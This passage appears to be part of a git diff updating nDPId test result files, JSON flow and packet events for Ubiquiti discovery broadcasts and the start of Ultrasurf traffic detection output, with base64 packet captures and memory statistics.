{"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943473817,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1486943473817,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943473817,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4VAAEARuPPAqAEB\/\/\/\/\/+l8JxEAt7UuAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADeiQsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdMbAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943473817,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943473817,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943483995,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1486943483995,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943483995,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4ZAAEARuPLAqAEB\/\/\/\/\/8v8JxEAt9GkAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADekwsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdQbAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943483995,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943483995,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943494148,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1486943494148,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943494148,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4dAAEARuPHAqAEB\/\/\/\/\/7qCJxEAt+IUAgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADenQsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdUbAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943494148,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943494148,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1486943504301,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1486943504301,"pkt":"\/\/\/\/\/\/\/\/gCqojWksCABFAADLv4hAAEARuPDAqAEB\/\/\/\/\/6dWJxEAt\/Q2AgYAqwIACoAqqI1pK8CoAhUCAAqAKqiNaSzAqAEBAQAGgCqojWkrCgAEAADepwsABHVibnQMAARVR1czAwA4VW5pRmlTZWN1cml0eUdhdGV3YXkuRVItZTEyMC52NC4zLjMzLjQ5MzYwODYuMTYxMjAzLjIwMzEWAA40LjMuMzMuNDkzNjA4NhUABFVHVzMXAAEAGAABABMABoAqqI1pKxIABAAAFdYbAAU0LjAuMA=="} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} 
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"},"ubntac2": {"version":"UniFiSecurityGateway.ER-e120.v4"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943473817,"flow_last_seen":1486943473817,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":59772,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943494148,"flow_last_seen":1486943494148,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47746,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943463665,"flow_last_seen":1486943463665,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":47871,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943483995,"flow_last_seen":1486943483995,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":52220,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} 
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943433175,"flow_last_seen":1486943433175,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":34085,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943443357,"flow_last_seen":1486943443357,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":44641,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943504301,"flow_last_seen":1486943504301,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":42838,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1486943453510,"flow_last_seen":1486943453510,"flow_idle_time":200000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":0,"thread_ts_msec":1486943504301,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"255.255.255.255","src_port":55321,"dst_port":10001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UBNTAC2","breed":"Safe","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8,"source":"ubntac2.pcap","alias":"nDPId-test","packets-captured":8,"packets-processed":8,"total-skipped-flows":0,"total-l4-payload-len":1400,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1486943504301} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 8/8 @@ -41,9 +41,9 @@ ~~ total active/idle flows...: 8/8 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5876871 bytes -~~ total memory freed........: 5876871 bytes -~~ total allocations/frees...: 118142/118142 +~~ total memory allocated....: 6010505 bytes +~~ total memory freed........: 6010505 bytes +~~ total allocations/frees...: 120904/120904 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 703 chars 
diff --git a/test/results/ultrasurf.pcap.out b/test/results/ultrasurf.pcap.out
new file mode 100644
index 000000000..cb4a18589
--- /dev/null
+++ b/test/results/ultrasurf.pcap.out
@@ -0,0 +1,38 @@ +00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ultrasurf.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ultrasurf.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1656652731609} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656652731609,"flow_last_seen":1656652731609,"flow_idle_time":7580000,"flow_min_l4_payload_len":2576,"flow_max_l4_payload_len":2576,"flow_tot_l4_payload_len":2576,"flow_avg_l4_payload_len":2576,"midstream":1,"thread_ts_msec":1656652731609,"l3_proto":"ip4","src_ip":"65.49.68.25","dst_ip":"10.132.0.23","src_port":50053,"dst_port":37898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+03968{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1656652731609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2646,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":2646,"pkt_l4_len":2608,"thread_ts_msec":1656652731609,"pkt":"zBr67JUAcGlaOmiJgQAAyAgARQAKRM7tQAA3BtrhQTFEGQqEABfDhZQKC2KlCkpUkTKAEAFmmhsAAAEBCAom3sf8A1a0+8wcMEFbpDhmmW\/ro\/\/D3SORouvGcLJVns8eaTu23\/042aUVj61nN6Xm0ijnaUg+Npmao+ahS5YFWlU5gxCt1Bv2Dd8X34iKweQUI1pV18JFIZQX4tZ8BgqPMHrM3xcO0sUVX\/OJ2pP8yGrJvNpjXCDZ3sKsZ8ObIJNR5C9HtP8VqqX5BjlcTX8CqWIvl0ZBgk5WvH2JDhc248aWcjJLqPpHeFkT7LlN9WbJOIcs7fIr7w\/l\/4QosbfyzysqE5\/jPdpXVbudJyd5Co9YEs4l8Q\/6o70Ffd9ZnAxSFwa0dpQq9l84dMMc++LU4g\/5uQo7ByYovlcOyQGaJMbvwFaomPtCm2gWgqlbGVYuy1fssTPKvOwtvuxi+uQSp0x90L4yICcjWy7QquRyX6vF4Kj7bnDBXk4Yuwhy\/eBFma8pYGq3nFybEXkBIoJM5PIx+daLngl8AMAATYZytmx8fvkxAn9nAl1vSL8DDtuJzW4bIpWNuUkrrQEo1qDNWTbFKTev+4WI2s2Dq0ECsJXkOzrv7ys8hbU9zt92MomzoOYqefTDPaVuUCZTdCEQ9uujt8du7o\/jXx78zGYtv58gGSActDbLr2l16bg\/8Uk3qmgnE4b9MmARdZqn4TXakOrfI7oMcpdzvXVxR02+JkOD2SzX0V6zyWGabGkpaHNUvZKhT9p9qT+xCygM23AxUgBVWRhbJOtoeCCmB9GtvrbByAuiFwMDCxpSuPxAzaqU1CDJRf0ARgMOGGitml366m2q80qwL6szhusBMTOpH\/+lZ+4L1ssuGJ7LmGwmTwj7CD7eU0QlRuuYEYdh\/W6inXP9pJwRRn5uXzjK2UGyXSKJQgFhgjKV\/gTtslaG1kJ9wEH3bRwjXGp+ck2NQY4p+Bw8hIGicivItS9FcKEUt6XedxsZehCTx0hYNbo5lDpgelreL+du2TIrCAGAHDGERkejYlaJXbPaNGkoCdPiWIM\/wKUpngDY6o\/X+oS4sqzbyHIJrWfx\/DN